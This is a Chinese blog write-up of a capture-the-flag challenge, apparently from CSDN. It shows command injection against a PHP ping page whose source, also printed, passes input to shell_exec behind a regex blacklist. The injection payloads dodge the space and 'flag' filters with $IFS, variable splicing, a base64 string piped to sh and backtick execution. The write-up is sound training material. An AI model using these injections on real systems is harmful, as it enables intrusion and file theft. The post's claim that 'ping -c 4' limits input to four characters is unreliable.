BUUCTF [GXYCTF2019]Ping Ping Ping 1

最新推荐文章于 2024-07-25 10:08:48 发布
最新推荐文章于 2024-07-25 10:08:48 发布
阅读量5.7k 收藏 14
点赞数 5
分类专栏: buuctf 文章标签: web web安全 bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/123427219
版权

[GXYCTF2019]Ping Ping Ping 1

在本题我们考察的是命令执行

已进入本关,我们发现他在询问 ?ip

我们先尝试输入

?ip=127.0.0.1

发现访问成功

查询一下它的目录:

?ip=127.0.0.1|ls

发现有两个文件夹flag.php,index.php,发现 flag 我们尝试访问 flag。

?ip=127.0.0.1|cat flag.php

点击查询,页面回显 fxck your space
很明显我们需要进行一个空格的过滤

空格过滤常见绕过注释:

< > %20(space), %09(tab), $IFS$1

输入之后

?ip=127.0.0.1|cat<flag.php

发现:
在这里插入图片描述

可以知道,在本题它还过滤了 符号

所以我们换一种 空格的过滤方法:


?ip=127.0.0.1|cat$IFS$1flag.php

在这里插入图片描述

坏了,它把flag都给过滤了,已经没有什么好的办法了,只能先尝试访问一下前面的 index.php

?ip=127.0.0.1|cat$IFS$1index.php

在这里插入图片描述

访问源码:

<?php
if(isset($_GET['ip'])){
  $ip = $_GET['ip'];
  if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "<pre>";
  print_r($a);
}

?>

源代码告诉我们 如果我们输入的 ip是存在的话,那么 ip=ip,并且会进行一个正则匹配(黑名单过滤),并且如果我们构造的payload中有 空格 页面就会返回一个 fxck your space ,如果我们构造的payload中有 bash 页面就会返回一个 fxck your bash…

什么是bash:

要想了解bash,就要先知道什么是shell:
首先,shell是一个程序,提供用户与电脑对话的环境(环境唯一:命令提示符又称为命令提示符)。shell可以接收到用户输入的命>令,将命令送入操作系统进行执行,并发布会结果。
再着,shell也可以作为一个命令解释器,就是我们常说的脚本。它支持变量,条件判断,循环操作等语法,所以我们可以用shell来>写出各种小程序(脚本)
而bash就是shell的脚本类型之一(还有sh csh tcsh 等),bash是目前最常用的shell。进入命令环境以后,一般就打开了bash了 我>们可以使用bash命令来构造shell来查找flag,本关虽然黑掉了bash 但我们还有 sh 用!!! 哈皮
if完之后,我们会遇见一个命令函数 shell_exec("ping -c 4 ".$ip)

if完之后,我们会遇见一个命令函数 shell_exec("ping -c 4 ".$ip),换句话说我们只能输入四个字符

shell_exec — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。

shell_exec(string $cmd): string

exec 是 Shell 内置命令,它有两种用法,一种是执行 Shell 命令,一种是操作文件描述符

ping -c Count 指定要被发送(或接收)的回送信号请求的数目,由 Count 变量指出

之后输出<pre>(输出原代码),并且将变量 a 所表示的数据给打印出来,如果我们令 $a=g;那么就可以巧妙的饶过falg的黑名单

构造:

?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

查看页面源代码,发现flag。
在这里插入图片描述
当然这里还有别的办法例如借用sh来构造shell 对cat flag.php进行base编码---->Y2F0IGZsYWcucGhw(这里bash被黑名单过滤了,不然也可以使用)

?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

还有一种大佬操作,是我查询博客才了解的

内联执行 (真·大佬操作,小弟只有膜拜的份儿)

ip=127.0.0.1;cat$IFS$9`ls`

​ 注:内联,就是将反引号内命令的输出作为输入执行。

hcjtn
关注
  • 5
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5073
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
Linux批量pingIP地址
05-17
在Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
命令执行绕过 [GXYCTF2019]Ping Ping Ping1
m0_75178803的博客
10-10 810
在去年参加的第四届强网杯全国网络安全竞赛中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参赛WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值:本文目的在于结合 BU_绕过空格过滤。所以cat$IFS$1`ls`也相当于cat falg.php;`` 反引号 cat$IFS$1`ls`cat $a$b.php。通过变量赋值,再进行拼接,即可进行绕过。
BUUctf [GXYCTF2019]Ping Ping Ping
qq_61988806的博客
10-28 1231
BUUctf [GXYCTF2019]Ping Ping Ping
BUUCTF[GXYCTF2019]Ping Ping Ping
m0_73818758的博客
09-22 166
分号隔开每条命令,整行命令按照从左到右的顺序执行,彼此之间互不影响,所有的命令都会执行。对于网络管理员和普通用户来说,我们通常用它来测试网络的连通情况,如果无法正常令是检测网络故障的基本工具。尝试直接获取flag.php中的内容,/?(3)根据ping返回的TTL值来判断对方所使用的操作系统及数据包经过路由器数量。(4)因为具备以上功能,ping命令常常被黑客用来进行网络扫描和攻击。可以看出这里已经成功绕过了,但是还是没有发现flag,看一下源码。发现有flag.php(恭喜你距离得到flag又近了一步)
BUUCTF [GXYCTF2019]Ping Ping Ping
m0_49025459的博客
04-30 690
题目 打开网站 就这么点东西,啥都没有,那么我们浅试一下 那我们ls一下将文件名都输出出来,我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句,例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错,才执行后面的语句,所以前面的语句必须为假,例如 ping 1||whoami &前面的...
buuctf [GXYCTF2019]Ping Ping Ping
m0_63711447的博客
05-25 1334
1、打开题目环境 2、 先ping一下试试 3、直接cat flag,提示说不能有空格 4、用%09过滤空格,可能是过滤了特殊的字符 5、
buuctf [GXYCTF2019]Ping Ping Ping 1
weixin_45642610的博客
01-11 1646
buuctf [GXYCTF2019]Ping Ping Ping 1-刷题个人日记 小白一个,写给自己看。 进去后是这样: ctrl+u看网页源码也没什么,随便输个数据看看: 源码一样没什么。看题目提示,试试你能想到的方法,比如sql注入:输入ip=1' 不是sql注入,试完了发现是命令执行,输入 /?ip=1;ls 两个都看看,先看index.php输入: /?ip=1;cat index.php 看来过滤了空格 再输入 /?ip=1;cat$IFS$1index.php IFS在系统命令
BUUCTF—[GXYCTF2019]Ping Ping Ping1
qq_57778984的博客
10-22 337
内联绕过就是将反引号内命令的输出结果作为另一个命令的输入来执行,比如系统对flag字符进行了过滤,但是单独使用ls命令时又会回显出index.php和flag.php文件,那么我们可以通过ls命令将index.php和flag.php作为输入,通过cat查看两个文件获取flag,而不用输入cat flag.php触发关键词。3.尝试在执行ping命令后执行其他命令,用";连接两个命令时,第二个命令只有在第一个命令执行成功的情况下才会执行。连接两个命令时,第二个命令只有在第一个命令执行失败的情况下才会执行。
BUUCTF】[GXYCTF2019]Ping Ping Ping 1
manerzi的博客
12-16 289
BUUCTF】[GXYCTF2019]Ping Ping Ping 1
LabVIEW实现网络Ping IP测试
07-10
1. **ICMP协议**:Ping命令基于Internet Control Message Protocol(ICMP)协议,用于网络设备间的错误检测和简单通信。 2. **Echo请求与响应**:在ping测试中,发送端发送一个Echo请求报文到目标IP,接收端接收到...
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
Labview ping IP.vi
01-07
通过程序来ping设备的IP地址,这样就可以确认当前设备是否已经正确连接到电脑。在连接设备之前可以判断
ping工具.zip
03-19
1. **发送时间**:记录每次ping请求发出的具体时间,便于分析网络波动与特定事件的时间关系。 2. **响应时间**:显示从发送请求到接收到回应所需的时间,这是衡量网络延迟的关键指标。 3. **状态信息**:可能包括...
网络安全之初始访问阶段攻防手段(三)
最新发布
子非渔
07-25 981
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
中小企业常见的网络安全问题及防范措施
w651428055的博客
07-22 692
在当今数字化时代,Web应用程序已经成为企业与用户互动的主要平台,但随之而来的是日益复杂的网络安全威胁。为了保护Web应用程序免受各种攻击,Web应用程序防火墙(WAF)应运而生。本文将深入探讨WAF的概念、工作原理、分类、特点以及如何选择和部署WAF,帮助读者更全面地理解WAF在网络安全中的重要作用。
网络安全相关竞赛比赛
黑战士的博客
07-18 1044
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
2024春秋杯网络安全联赛夏季赛Crypto(AK)解题思路及用到的软件
符啸九天的博客
07-22 1075
2024春秋杯网络安全联赛夏季赛Crypto解题思路以及用到的软件1.vm(虚拟机kali)和Ubuntu,正常配置即可B站有很多。2.Visual Studio Code(里面要配置python,crypto库和Sagemath数学软件系统Sagemath)。3.随波逐流工作室 (1o1o.xyz)ctf工具。2024春秋竞赛ezzzecc视频解题思路2024春秋竞赛happy2024视频解析2024春秋竞赛夏季赛Signature解题思路
[GXYCTF2019]Ping Ping Ping
09-14
[GXYCTF2019]Ping Ping Ping是一道关于命令注入的题目。在提供的引用中,我们可以看到一个简单的PHP代码段,通过传递ip参数进行ping命令的执行。同时,引用中还给出了一些限制条件,如禁止使用特殊符号、空格、bash命令以及含有"flag"字符等。 根据引用中的代码,我们可以看到如果传递的ip参数满足特定的匹配条件,会输出相应的错误信息并结束程序。因此,我们需要绕过这些匹配条件来执行命令注入。 根据引用中的代码,我们可以看到在ip参数的检查中,会通过正则表达式匹配来判断是否包含特定的符号。因此,我们可以利用一些绕过技巧来绕过这些过滤条件。 最后,引用中给出了一种构造payload的方法。其中,可以通过使用简单变量替换来覆盖拼接flag。具体来说,我们可以将ip参数设置为"127.0.0.1;a=g;cat$IFS$1fla$a.php",这样就可以绕过过滤条件并执行cat命令来获取flag内容。 综上所述,***
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值